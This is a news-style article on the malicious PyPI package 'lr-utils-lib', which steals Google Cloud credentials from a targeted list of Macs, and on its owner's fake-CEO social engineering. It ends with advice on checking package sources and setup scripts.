Researchers have recently discovered a peculiar Python code package online designed to pilfer Google Cloud Platform credentials from a specific group of macOS users. The package, known as “lr-utils-lib,” appeared on the Python Package Index (PyPi) in early June. Hidden within the setup file, the malicious code springs into action upon installation. It identifies macOS systems and retrieves the system’s IOPlatformUUID, a unique identifier for each Mac computer.

It appears that the malware is set to infect only a predetermined list of 64 particular machines. The motive behind targeting these machines and the identity of the attacker remain unknown. Interestingly, the package’s name closely resembles that of a legitimate package called “lr-utils,” widely utilized in deep learning and neural networks applications. Dark Reading has reached out to Checkmarx for insight into potential targets of this campaign.

From the targeted machines, lr-utils-lib aims to extract Google Cloud Platform credentials to a remote server. This could pave the way for subsequent attacks on cloud assets, such as data theft, malware insertion, and the introduction of vulnerable components for lateral movement. Ross Bryant, Phylum’s head of research, underscores the severe risk posed by cybercriminals obtaining digital credentials, granting them extensive rights and privileges.

A notable aspect of the campaign involves social engineering tactics. The package owner, identifying as “Lucid Zenith,” claims to be the CEO of Apex Companies LLC on LinkedIn. Despite the presence of the real CEO’s profile, AI platforms like Perplexity have mistakenly recognized Lucid Zenith as the legitimate CEO. This misinformation has raised concerns about the reliability of AI-powered tools for information verification.

Malicious packages are a prevalent threat, masquerading as legitimate software components while harboring malevolent intent, often centered around data theft. In this case, the lr-utils-lib campaign stands out for its highly targeted use of open-source software. While malicious npm packages linked to North Korean activity have demonstrated similar targeted approaches, such tactics are relatively rare. Dark Reading is pursuing further details from Checkmarx regarding lr-utils-lib’s status.

To guard against unwittingly accepting targeted packages, organizations must exercise vigilance during software upgrades, verifying sources and contents thoroughly. Critical thinking is essential in defending against attacks of this nature. Checkmarx emphasizes the importance of scrutinizing package sources, verifying setup script contents, and promoting a culture of critical thinking to combat such threats effectively.

In conclusion, the discovery of lr-utils-lib underscores the evolving landscape of cybersecurity threats, urging organizations to remain proactive in safeguarding their digital assets against sophisticated targeted attacks. Vigilance, critical thinking, and stringent verification processes are crucial in mitigating the risks posed by malicious packages lurking within the software supply chain.

Lidhja e burimit